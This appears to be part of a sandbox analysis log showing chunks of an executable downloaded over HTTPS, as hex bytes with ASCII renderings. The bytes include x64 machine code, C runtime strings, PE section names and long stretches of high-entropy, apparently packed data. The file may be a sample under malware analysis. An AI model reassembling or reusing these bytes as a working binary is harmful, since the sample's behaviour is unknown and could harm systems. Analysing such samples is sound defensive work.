                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC9INData Raw: 7f 41 70 48 81 c1 80 00 00 00 49 81 e8 80 00 00 00 49 81 f8 80 00 00 00 73 c2 4d 8d 48 0f 49 83 e1 f0 4d 8b d9 49 c1 eb 04 47 8b 9c 9a 88 50 02 00 4d 03 da 41 ff e3 f3 42 0f 7f 44 09 80 f3 42 0f 7f 44 09 90 f3 42 0f 7f 44 09 a0 f3 42 0f 7f 44 09 b0 f3 42 0f 7f 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18
                                                                                                                                                                                                                  Data Ascii: ApHIIsMHIMIGPMABDBDBDBDBDBDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC17INData Raw: ff 48 8b c8 48 8b 54 24 38 48 8b 12 41 b8 02 00 00 00 e8 65 fc ff ff 48 83 c4 28 c3 cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 89 4c 24 30 48 89 54 24 38 44 89 44 24 40 48 8b 12 48 8b c1 e8 32 fc ff ff ff d0 e8 5b fc ff ff 48 83 c4 28 c3 cc cc cc cc cc cc 48 83 ec 28 48 89 4c 24 30 48 89 54 24 38 48 8b 54 24 38 48 8b 12 41 b8 02 00 00 00 e8 ff fb ff ff 48 83 c4 28 c3 cc cc cc cc cc cc 0f 1f 40 00 48 83 ec 28 48 89 4c 24 30 48 89 54 24 38 4c 89 44 24 40 44 89 4c 24 48 45 8b c1 48 8b c1 e8 cd fb ff ff 48 8b 4c 24 40 ff d0 e8 f1 fb ff ff 48 8b c8 48 8b 54 24 38 41 b8 02 00 00 00 e8 ae fb ff ff 48 83 c4 28 c3 cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 56 48 83 ec 20 80 79 08 00 4c 8b f2 48 8b f1 74 4c 48 8b 01 48 85 c0 74 44 48 83
                                                                                                                                                                                                                  Data Ascii: HHT$8HAeH(ffH(HL$0HT$8DD$@HH2[H(H(HL$0HT$8HT$8HAH(@H(HL$0HT$8LD$@DL$HEHHL$@HHT$8AH(H\$Ht$H|$AVH yLHtLHHtDH
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC24INData Raw: 20 5f c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 20 48 8b 01 33 ed 4c 8b f9 48 8b 10 48 85 d2 0f 84 68 01 00 00 4c 8b 15 c5 a7 01 00 41 8b ca 49 8b f2 48 33 32 83 e1 3f 4d 8b ca 48 d3 ce 4c 33 4a 08 49 8b da 48 33 5a 10 49 d3 c9 48 d3 cb 4c 3b cb 0f 85 a7 00 00 00 48 2b de b8 00 02 00 00 48 c1 fb 03 48 3b d8 48 8b fb 48 0f 47 f8 8d 45 20 48 03 fb 48 0f 44 f8 48 3b fb 72 1e 44 8d 45 08 48 8b d7 48 8b ce e8 99 3a 00 00 33 c9 4c 8b f0 e8 d7 1e 00 00 4d 85 f6 75 28 48 8d 7b 04 41 b8 08 00 00 00 48 8b d7 48 8b ce e8 75 3a 00 00 33 c9 4c 8b f0 e8 b3 1e 00 00 4d 85 f6 0f 84 ca 00 00 00 4c 8b 15 27 a7 01 00 4d 8d 0c de 49 8d 1c fe 49 8b f6 48 8b cb 49 2b c9 48 83 c1 07 48 c1 e9 03 4c 3b cb 48 0f 47 cd 48 85 c9 74 10 49 8b c2 49 8b
                                                                                                                                                                                                                  Data Ascii: _H\$Hl$Ht$WAVAWH H3LHHhLAIH32?MHL3JIH3ZIHL;H+HH;HHGE HHDH;rDEHH:3LMu(H{AHHu:3LML'MIIHI+HHL;HGHtII
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC32INData Raw: 00 00 85 c0 74 1c 48 8b 0d 87 a0 01 00 4c 8b c3 ba 08 00 00 00 ff 15 79 da 00 00 48 85 c0 74 d1 eb 0d e8 79 ff ff ff c7 00 0c 00 00 00 33 c0 48 83 c4 20 5b c3 cc cc cc 48 85 c9 74 36 53 48 83 ec 20 4c 8b c1 33 d2 48 8b 0d 46 a0 01 00 ff 15 48 da 00 00 85 c0 75 16 ff 15 06 d9 00 00 8b c8 e8 67 fe ff ff 8b d8 e8 34 ff ff ff 89 18 48 83 c4 20 5b c3 48 3b ca 73 04 83 c8 ff c3 33 c0 48 3b ca 0f 97 c0 c3 cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 30 45 33 f6 41 8b e9 48 8b da 48 8b f9 48 85 c9 75 24 44 38 72 28 74 0d 48 8b 4a 10 e8 77 ff ff ff 44 88 73 28 4c 89 73 10 4c 89 73 18 4c 89 73 20 e9 0e 01 00 00 44 38 31 75 55 4c 39 72 18 75 45 44 38 72 28 74 0d 48 8b 4a 10 e8 48 ff ff ff 44 88 73 28 b9 02 00 00 00 e8 72 2c 00 00 48
                                                                                                                                                                                                                  Data Ascii: tHLyHty3H [Ht6SH L3HFHug4H [H;s3H;HHXHhHpHx AVH0E3AHHHu$D8r(tHJwDs(LsLsLs D81uUL9ruED8r(tHJHDs(r,H
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC40INData Raw: 32 50 3e a0 82 44 8b c6 8b d3 48 8b cf ff 15 d1 bc 00 00 eb 0b 8b d3 48 8b cf ff 15 dc ba 00 00 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 50 41 8b d9 49 8b f8 8b f2 4c 8d 0d 39 dd 00 00 48 8b e9 4c 8d 05 27 dd 00 00 48 8d 15 28 dd 00 00 b9 11 00 00 00 e8 da fc ff ff 4c 8b d8 48 85 c0 74 5f 49 ba 70 e2 57 50 62 1f a1 e3 48 8b 94 24 a0 00 00 00 44 8b cb 48 8b 8c 24 98 00 00 00 4c 8b c7 48 8b 84 24 80 00 00 00 48 89 54 24 40 8b d6 48 89 4c 24 38 48 8b 8c 24 90 00 00 00 48 89 4c 24 30 8b 8c 24 88 00 00 00 89 4c 24 28 48 8b cd 48 89 44 24 20 49 8b c3 ff 15 11 bc 00 00 eb 32 33 d2 48 8b cd e8 3d 00 00 00 8b c8 44 8b cb 8b 84 24 88 00 00 00 4c 8b c7 89 44 24 28 8b d6 48 8b 84 24 80 00 00 00 48 89 44
                                                                                                                                                                                                                  Data Ascii: 2P>DHHH\$0Ht$8H _H\$Hl$Ht$WHPAIL9HL'H(LHt_IpWPbH$DH$LH$HT$@HL$8H$HL$0$L$(HHD$ I23H=D$LD$(H$HD
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC48INData Raw: b6 d0 48 c1 ea 03 0f b6 c0 83 e0 07 0f b6 4c 14 20 0f ab c1 49 ff c1 88 4c 14 20 41 8a 01 84 c0 75 dd eb 1f 41 0f b6 c1 ba 01 00 00 00 41 0f b6 c9 83 e1 07 48 c1 e8 03 d3 e2 84 54 04 20 75 1f 49 ff c0 45 8a 08 45 84 c9 75 d9 33 c0 48 8b 4c 24 40 48 33 cc e8 82 4a ff ff 48 83 c4 58 c3 49 8b c0 eb e9 e8 a7 52 ff ff cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 4c 8b d2 48 8d 35 ab 39 ff ff 41 83 e2 0f 48 8b fa 49 2b fa 48 8b da 4c 8b c1 0f 57 db 49 8d 42 ff f3 0f 6f 0f 48 83 f8 0e 77 73 8b 84 86 4c c9 00 00 48 03 c6 ff e0 66 0f 73 d9 01 eb 60 66 0f 73 d9 02 eb 59 66 0f 73 d9 03 eb 52 66 0f 73 d9 04 eb 4b 66 0f 73 d9 05 eb 44 66 0f 73 d9 06 eb 3d 66 0f 73 d9 07 eb 36 66 0f 73 d9 08 eb 2f 66 0f 73 d9 09 eb 28 66 0f 73 d9 0a eb 21 66 0f 73 d9 0b eb 1a 66 0f 73 d9
                                                                                                                                                                                                                  Data Ascii: HL IL AuAAHT uIEEu3HL$@H3JHXIRH\$Ht$WLH59AHI+HLWIBoHwsLHfs`fsYfsRfsKfsDfs=fs6fs/fs(fs!fsfs
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC56INData Raw: 8b 6c 24 70 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc 48 85 c9 0f 84 00 01 00 00 53 48 83 ec 20 48 8b d9 48 8b 49 18 48 3b 0d 04 33 01 00 74 05 e8 41 a2 ff ff 48 8b 4b 20 48 3b 0d fa 32 01 00 74 05 e8 2f a2 ff ff 48 8b 4b 28 48 3b 0d f0 32 01 00 74 05 e8 1d a2 ff ff 48 8b 4b 30 48 3b 0d e6 32 01 00 74 05 e8 0b a2 ff ff 48 8b 4b 38 48 3b 0d dc 32 01 00 74 05 e8 f9 a1 ff ff 48 8b 4b 40 48 3b 0d d2 32 01 00 74 05 e8 e7 a1 ff ff 48 8b 4b 48 48 3b 0d c8 32 01 00 74 05 e8 d5 a1 ff ff 48 8b 4b 68 48 3b 0d d6 32 01 00 74 05 e8 c3 a1 ff ff 48 8b 4b 70 48 3b 0d cc 32 01 00 74 05 e8 b1 a1 ff ff 48 8b 4b 78 48 3b 0d c2 32 01 00 74 05 e8 9f a1 ff ff 48 8b 8b 80 00 00 00 48 3b 0d b5 32 01 00 74 05 e8 8a a1 ff ff 48 8b 8b 88 00 00 00 48 3b 0d a8 32 01 00 74 05 e8
                                                                                                                                                                                                                  Data Ascii: l$pH0A_A^A]A\_HSH HHIH;3tAHK H;2t/HK(H;2tHK0H;2tHK8H;2tHK@H;2tHKHH;2tHKhH;2tHKpH;2tHKxH;2tHH;2tHH;2t
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC63INData Raw: 40 14 2b c1 48 8b 8c 24 a0 00 00 00 48 8b 94 24 a0 00 00 00 8b 52 08 8b 49 10 2b ca 48 8b 94 24 a0 00 00 00 48 8b 12 48 89 94 24 80 00 00 00 44 8b c0 8b d1 48 8b 8c 24 a0 00 00 00 48 8b 84 24 80 00 00 00 ff 50 20 41 b8 01 00 00 00 33 d2 48 8b 8c 24 a8 00 00 00 ff 15 bf 5d 00 00 48 8b 84 24 a0 00 00 00 48 8b 40 10 48 8b 8c 24 a0 00 00 00 48 89 41 08 e9 9c 01 00 00 8b 44 24 44 89 44 24 30 83 7c 24 30 01 74 02 eb 14 48 8b 84 24 a0 00 00 00 c7 40 18 00 00 00 00 e9 0a 01 00 00 0f bf 44 24 58 48 8b 8c 24 a0 00 00 00 89 41 08 0f bf 44 24 5a 48 8b 8c 24 a0 00 00 00 89 41 0c 48 8b 84 24 a0 00 00 00 48 83 c0 08 48 8b d0 48 8b 8c 24 a8 00 00 00 ff 15 48 5d 00 00 b8 ff ff ff ff 48 8b 4c 24 68 48 23 c8 48 8b c1 8b c0 f2 48 0f 2a c0 f2 0f 5e 05 11 db 00 00 f2 0f 59 05
                                                                                                                                                                                                                  Data Ascii: @+H$H$RI+H$HH$DH$H$P A3H$]H$H@H$HAD$DD$0|$0tH$@D$XH$AD$ZH$AH$HHH$H]HL$hH#HH*^Y
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC71INData Raw: c0 75 06 ff 15 1b 3d 00 00 48 8b 44 24 70 48 89 44 24 30 33 d2 33 c9 ff 15 2f 3f 00 00 85 c0 75 06 ff 15 fd 3c 00 00 33 d2 33 c9 ff 15 1b 3f 00 00 85 c0 75 06 ff 15 e9 3c 00 00 33 d2 33 c9 ff 15 07 3f 00 00 85 c0 75 06 ff 15 d5 3c 00 00 33 d2 33 c9 ff 15 f3 3e 00 00 85 c0 75 06 ff 15 c1 3c 00 00 33 d2 33 c9 ff 15 df 3e 00 00 85 c0 75 06 ff 15 ad 3c 00 00 33 d2 33 c9 ff 15 cb 3e 00 00 85 c0 75 06 ff 15 99 3c 00 00 33 d2 33 c9 ff 15 b7 3e 00 00 85 c0 75 06 ff 15 85 3c 00 00 33 d2 33 c9 ff 15 a3 3e 00 00 85 c0 75 06 ff 15 71 3c 00 00 33 d2 33 c9 ff 15 8f 3e 00 00 85 c0 75 06 ff 15 5d 3c 00 00 33 d2 33 c9 ff 15 7b 3e 00 00 85 c0 75 06 ff 15 49 3c 00 00 33 d2 33 c9 ff 15 67 3e 00 00 85 c0 75 06 ff 15 35 3c 00 00 33 d2 33 c9 ff 15 53 3e 00 00 85 c0 75 06 ff 15
                                                                                                                                                                                                                  Data Ascii: u=HD$pHD$033/?u<33?u<33?u<33>u<33>u<33>u<33>u<33>uq<33>u]<33{>uI<33g>u5<33S>u
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC79INData Raw: e0 1d 00 00 33 d2 33 c9 ff 15 fe 1f 00 00 85 c0 75 06 ff 15 cc 1d 00 00 33 d2 33 c9 ff 15 ea 1f 00 00 85 c0 75 06 ff 15 b8 1d 00 00 33 d2 33 c9 ff 15 d6 1f 00 00 85 c0 75 06 ff 15 a4 1d 00 00 33 d2 33 c9 ff 15 c2 1f 00 00 85 c0 75 06 ff 15 90 1d 00 00 33 d2 33 c9 ff 15 ae 1f 00 00 85 c0 75 06 ff 15 7c 1d 00 00 33 d2 33 c9 ff 15 9a 1f 00 00 85 c0 75 06 ff 15 68 1d 00 00 33 d2 33 c9 ff 15 86 1f 00 00 85 c0 75 06 ff 15 54 1d 00 00 33 d2 33 c9 ff 15 72 1f 00 00 85 c0 75 06 ff 15 40 1d 00 00 33 d2 33 c9 ff 15 5e 1f 00 00 85 c0 75 06 ff 15 2c 1d 00 00 33 d2 33 c9 ff 15 4a 1f 00 00 85 c0 75 06 ff 15 18 1d 00 00 33 d2 33 c9 ff 15 36 1f 00 00 85 c0 75 06 ff 15 04 1d 00 00 33 d2 33 c9 ff 15 22 1f 00 00 85 c0 75 06 ff 15 f0 1c 00 00 33 d2 33 c9 ff 15 0e 1f 00 00 85
                                                                                                                                                                                                                  Data Ascii: 33u33u33u33u33u|33uh33uT33ru@33^u,33Ju336u33"u33
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC87INData Raw: 01 00 00 00 01 00 00 00 00 00 00 00 e0 6d 01 80 01 00 00 00 02 00 00 00 00 00 00 00 d8 6d 01 80 01 00 00 00 01 00 00 00 00 00 00 00 b8 6d 01 80 01 00 00 00 01 00 00 00 00 00 00 00 60 6e 01 80 01 00 00 00 08 00 00 00 00 00 00 00 20 73 01 80 01 00 00 00 15 00 00 00 00 00 00 00 5f 5f 62 61 73 65 64 28 00 00 00 00 00 00 00 00 5f 5f 63 64 65 63 6c 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 00 00 00 00 5f 5f 73 74 64 63 61 6c 6c 00 00 00 00 00 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 00 00 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 00 00 00 00 5f 5f 76 65 63 74 6f 72 63 61 6c 6c 00 00 00 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 65 61 62 69 00 00 00 00 00 00 5f 5f 73 77 69 66 74 5f 31 00 00 00 00 00 00 00 5f 5f 73 77 69 66 74 5f 32 00 00 00 00 00 00 00 5f 5f 73
                                                                                                                                                                                                                  Data Ascii: mmm`n s__based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__s
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC95INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10
                                                                                                                                                                                                                  Data Ascii: ((((( H
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC103INData Raw: 00 00 00 00 61 00 72 00 2d 00 53 00 59 00 00 00 00 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 00 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 00 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 00 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 00 00 00 00 65 00 73 00 2d 00 41 00 52 00 00 00 00 00 00 00 61 00 72 00 2d 00 4c 00 42 00 00 00 00 00 00 00 65 00 6e 00 2d 00 5a 00 57 00 00 00 00 00 00 00 65 00 73 00 2d 00 45 00 43 00 00 00 00 00 00 00 61 00 72 00 2d 00 4b 00 57 00 00 00 00 00 00 00 65 00 6e 00 2d 00 50 00 48 00 00 00 00 00 00 00 65 00 73 00 2d 00 43 00 4c 00 00 00 00 00 00 00 61 00 72 00 2d 00 41 00 45 00 00 00 00 00 00 00 65 00 73 00 2d 00 55 00 59 00 00 00 00 00 00 00 61 00 72 00 2d 00 42 00 48 00 00 00 00 00 00 00 65 00 73 00 2d 00 50 00 59 00 00
                                                                                                                                                                                                                  Data Ascii: ar-SYen-BZes-PEar-JOen-TTes-ARar-LBen-ZWes-ECar-KWen-PHes-CLar-AEes-UYar-BHes-PY
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC110INData Raw: ab e4 be 3f 00 00 00 c0 c0 38 bf 3f 00 00 00 80 96 8c bf 3f 00 00 00 30 2d e0 bf 3f 00 00 00 a0 c2 19 c0 3f 00 00 00 70 4f 43 c0 3f 00 00 00 60 bd 6c c0 3f 00 00 00 80 0c 96 c0 3f 00 00 00 00 3d bf c0 3f 00 00 00 10 4f e8 c0 3f 00 00 00 f0 42 11 c1 3f 00 00 00 a0 18 3a c1 3f 00 00 00 80 d0 62 c1 3f 00 00 00 90 6a 8b c1 3f 00 00 00 10 e7 b3 c1 3f 00 00 00 30 46 dc c1 3f 00 00 00 10 88 04 c2 3f 00 00 00 e0 ac 2c c2 3f 00 00 00 d0 b4 54 c2 3f 00 00 00 f0 9f 7c c2 3f 00 00 00 80 6e a4 c2 3f 00 00 00 b0 20 cc c2 3f 00 00 00 90 b6 f3 c2 3f 00 00 00 50 30 1b c3 3f 00 00 00 20 8e 42 c3 3f 00 00 00 20 d0 69 c3 3f 00 00 00 80 f6 90 c3 3f 00 00 00 60 01 b8 c3 3f 00 00 00 e0 f0 de c3 3f 00 00 00 30 c5 05 c4 3f 00 00 00 70 7e 2c c4 3f 00 00 00 d0 1c 53 c4 3f 00 00 00
                                                                                                                                                                                                                  Data Ascii: ?8??0-??pOC?`l??=?O?B?:?b?j??0F??,?T?|?n? ??P0? B? i??`??0?p~,?S?
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC118INData Raw: 8c 07 00 00 2e 69 64 61 74 61 24 36 00 00 00 00 00 10 02 00 08 0a 00 00 2e 64 61 74 61 00 00 00 08 1a 02 00 50 00 00 00 2e 64 61 74 61 24 72 00 58 1a 02 00 78 00 00 00 2e 64 61 74 61 24 72 73 00 00 00 00 d0 1a 02 00 d4 13 00 00 2e 62 73 73 00 00 00 00 00 30 02 00 a0 11 00 00 2e 70 64 61 74 61 00 00 00 50 02 00 5c 01 00 00 5f 52 44 41 54 41 00 00 00 60 02 00 30 01 00 00 2e 72 73 72 63 24 30 31 00 00 00 00 30 61 02 00 f8 bb 02 00 2e 72 73 72 63 24 30 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 04 01 00 04 42 00 00 01 09 01 00 09 22 00 00 01 00 00 00 01 06 02 00 06 32 02 30 09 04 01 00 04 22 00 00 84 2a 00 00 01 00 00 00 47 13 00 00 d1 13 00 00 40 4f 01 00 d1 13 00 00 01 02 01 00 02 50 00
                                                                                                                                                                                                                  Data Ascii: .idata$6.dataP.data$rXx.data$rs.bss0.pdataP\_RDATA`0.rsrc$010a.rsrc$02B"20"*G@OP
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC126INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 00 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC134INData Raw: 4e 59 52 68 f7 64 91 27 34 24 33 a5 2e c4 52 64 07 7a 94 63 8d 19 44 37 28 ac 20 f5 53 2b 1d 62 86 c6 8d 74 71 78 6f 35 59 0d f6 a4 ed 42 34 48 43 a5 2f 24 29 28 5a 1b 37 e1 01 13 08 1f 41 09 17 fe 7b 0f 21 03 33 3a 74 b3 35 5c 04 0f 55 1a 44 e6 15 66 08 3d 52 0e 2a c7 25 40 75 16 3f 49 26 f0 00 77 70 3d 0c 4b 4b ec 35 46 1d 36 54 18 21 bf 78 7d 5c 1a 5f 55 34 24 f3 0c 17 06 08 74 a6 21 ad 3c 3f 53 36 f0 01 cf 40 22 0b 4a f8 6e d1 16 33 36 56 b3 34 dc 48 30 53 06 f7 64 f9 01 55 2b 5b a5 2f 24 09 23 50 0e 1d e1 01 13 28 32 5c 02 13 fe 7b 0f 01 07 12 3a 46 b3 35 5c 48 2d 59 05 79 47 96 06 10 30 5d 04 ad 44 45 1e 5a bd 16 a6 17 43 28 12 ef 2e e1 5d 5b 6d 04 a5 04 cb 5b 17 05 11 fb 1c b0 07 5e 75 30 24 f3 0d a3 00 07 e8 a3 63 35 7a ea 93 04 ee 1a 1b a3 b3 8d
                                                                                                                                                                                                                  Data Ascii: NYRhd'4$3.RdzcD7( S+btqxo5YB4HC/$)(Z7A{!3:t5\UDf=R*%@u?I&wp=KK5F6T!x}\_U4$t!<?S6@"Jn36V4H0SdU+[/$#P(2\{:F5\H-YyG0]DEZC(.][m[^u0$c5z
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC142INData Raw: 08 6e fe 78 3c 56 b8 b9 30 21 51 7f fe 8e 33 62 1f 12 5c 4c e3 7a 53 29 c0 f7 47 53 28 d3 af ff 3f 2b 9a d2 86 06 89 41 be 78 3c d8 49 d4 71 03 99 a8 f5 2d 8f 64 ea 75 dd 75 77 44 e1 e1 00 8f b6 23 28 6b a4 5c 87 24 1a 27 f9 37 bc 31 c9 c0 99 18 26 cc b1 54 e9 59 85 96 a5 a5 2e b4 64 9e 35 7a d2 63 f1 60 75 53 28 aa 08 8d 3d aa 04 d6 57 c0 cc fb f0 0d 88 bc b0 95 bf e6 14 f2 0f 27 33 62 ea 45 d1 33 df 7a 53 ad 08 87 b3 b2 03 a1 b4 d0 3c e1 b0 8b 47 ca 78 c4 39 f3 f3 32 79 d8 2b a8 14 f2 5f 0d 83 3c e2 45 d1 e5 40 ca dd ba 6d 37 cf 16 98 2f ee 74 8b 6f fa 27 f9 c8 60 c8 f8 3c 18 71 74 e5 75 f1 19 cb 70 6c 13 8a e1 77 61 64 8d 60 dc 26 45 de bc ad d7 94 a2 7c 8b 52 dd 62 41 fb 10 3d e3 5c b7 14 88 9f d1 0a 9b 93 dd 4b f9 a3 82 03 e8 29 81 fb 16 92 e2 9e bb
                                                                                                                                                                                                                  Data Ascii: nx<V0!Q3b\LzS)GS(?+Ax<Iq-duuwD#(k\$'71&TY.d5zc`uS(=W'3bE3zS<Gx92y+_<E@m7/to'`<qtuplwad`&E|RbA=\K)
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC149INData Raw: 7d f9 bf 56 0c b4 27 bb 28 e0 e1 1d e7 2b 71 62 ca f7 11 a4 71 78 3c d2 90 4c 98 21 51 42 bd 0c 17 3a e0 84 45 a4 35 7a 53 af 31 13 14 1a ab 08 b5 39 b6 6f 55 22 ca c7 11 c4 71 78 3c 10 bf 0b f0 21 62 90 bd 0c 17 52 e0 84 45 c4 35 7a 53 af 29 13 6c 1a a3 b3 2d b2 c6 a2 35 46 61 ab 17 2a 70 78 74 d2 39 53 42 23 51 85 b0 6c bb 62 6b 00 30 08 35 7a 94 a2 61 bb 44 53 28 ca 97 39 3f 63 f4 a2 4e c6 bb 74 71 78 fb dd 18 d0 30 21 51 a0 67 48 33 da e2 88 e9 ec 74 c3 b5 08 4b dd c5 d7 0c d3 65 39 3f 5d 2a 62 41 c2 81 50 c9 78 3c 59 2e b5 37 21 96 c6 10 c0 33 62 6b 4b e9 64 35 f1 df 02 cd 37 44 53 df 8a a4 d3 3c 92 9b 8a c2 e9 bc e0 55 f0 3c 59 3c e9 b4 05 d9 42 34 48 52 97 6b 00 0a e0 11 f2 53 26 45 65 cd d7 0c e3 65 39 3f aa c5 46 c9 43 35 74 36 c4 64 59 b7 ec 14
                                                                                                                                                                                                                  Data Ascii: }V'(+qbqx<L!QB:E5zS19oU"qx<!bRE5zS)l-5Fa*pxt9SB#Qlbk05zaDS(9?cNtqx0!QgH3tKe9?]*bAPx<Y.7!3bkKd57DS<U<Y<B4HRkS&Eee9?FC5t6dY
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC157INData Raw: 35 5c 68 7a 89 68 30 a0 25 66 60 87 d7 73 ee 81 25 40 61 a9 ff d9 ba f6 20 77 7c 6e a4 55 1b 7f 79 e3 35 67 61 0b 34 db 3c 9e 78 4c 68 d6 f1 42 34 c9 47 46 33 df 68 bc 6b fb 17 02 1d 24 80 ac d7 ea 11 1d 67 7c 12 b4 1f c8 71 50 29 3c b7 1d 18 3c bb 75 75 12 bf 04 17 02 e2 44 45 44 dd ff 74 26 45 73 cf d6 68 6d 65 39 77 a0 fc 52 47 43 35 38 fa f5 74 5f 3c 68 03 f3 b8 67 c9 b7 cc 2a e6 54 45 14 7d f7 1e 86 04 c8 95 a4 f0 70 a5 1c 18 c7 8e 9d a8 f2 c9 8b 8e bf 78 7d 5c 8a 41 21 51 0e b9 c5 33 66 6b 00 a0 00 11 1a 5c a7 31 13 24 37 74 91 5d fe 7b 0f 25 e2 db 43 35 b5 1d 5c 68 5b bd 24 14 75 4e c3 fb 57 58 26 4f 54 4e ed 71 5e 07 9e e0 76 5e f7 a3 27 41 6d c8 ca 5a a8 90 aa 36 be b0 91 39 d0 70 4c 64 69 dc 0f 94 c9 47 46 3f 9a 4a e6 30 3e d8 62 61 63 cf 07 0c
                                                                                                                                                                                                                  Data Ascii: 5\hzh0%f`s%@a w|nUy5ga4<xLhB4GF3hk$g|qP)<<uuDEDt&Eshme9wRGC58t_<hg*TE}px}\A!Q3fk\1$7t]{%C5\h[$uNWX&OTNq^v^'AmZ69pLdiGF?J0>bac
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC165INData Raw: 17 ad 00 2f cf 1e 00 83 95 36 3e 2b 39 5b 5c ba 05 76 71 77 a9 9a b7 ab 78 a2 95 2a 6f 15 f0 a5 2e 20 93 b7 35 7a eb 4f c4 21 2c d2 6d 4b 90 2e 3f 2b f0 27 61 b6 02 74 71 f9 79 79 d9 7b 30 21 d0 37 14 a6 24 62 6b c7 24 7c a0 7d 53 26 84 5a 5c 43 a9 2e 7d 72 a1 d4 8e e3 34 5b b5 41 b8 88 bd 14 24 10 c9 32 84 c3 41 50 39 2c 57 df a6 21 1d 53 20 26 45 bc 09 7b df 8a 4e f3 ee c2 72 a8 80 aa 33 fd 3c 50 bd 2c 14 45 f1 26 51 0e bf 45 4b 52 69 00 25 ef 70 52 d8 73 5d bc 09 73 61 e8 a4 21 d7 da 0c 63 41 f9 dd b5 71 78 b7 91 74 e3 35 76 61 40 34 c1 bb 42 69 00 61 8d 9d 87 ac d9 82 72 5c 56 e2 6b 65 b8 7a 33 fb 3d be bc f4 19 69 71 fd 34 24 6f f1 44 49 44 b5 